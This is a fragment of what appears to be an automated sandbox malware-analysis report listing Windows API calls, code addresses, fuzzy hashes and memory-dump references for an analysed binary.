• Opcode Fuzzy Hash: 182b144e17410a3ae3358526937ac22c55c4e6a603f1a8a0435f62c1452c1eb3
• Instruction Fuzzy Hash: 4F316D76B000509FCB45DF9CDCE0EDD73F1AF89704B0801B9E50AE3361EA70AA198B5A
APIs
• OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 0043D262
Strings
Similarity
• API ID: EventOpen
• String ID: -E~$z0_
• API String ID: 3658969616-3497079166
• Opcode ID: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
• Instruction ID: 4c960738fd572624f98c33cf1521ed59ac4ed7dc924c0bf984625c0e848ba6ca
• Opcode Fuzzy Hash: b9d1dcb91cfdc4d3c903aed4f4a19ee964a2ddc1ca2cde159e736153247c2ec8
• Instruction Fuzzy Hash: 2A216F727012149FC794DF9DDC91FA973B9AF88604B0441BDE809D3351EEB0AE898B5A
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F238
Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CopyFile
                                                                                                                                                                                                                      • String ID: 0$ 0
                                                                                                                                                                                                                      • API String ID: 1304948518-2612948726
APIs
• StrCmpCA.SHLWAPI(00000000,Network), ref: 0041ED6E
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID:
• String ID: 0$Network
• API String ID: 0-350251746
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3711338234.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0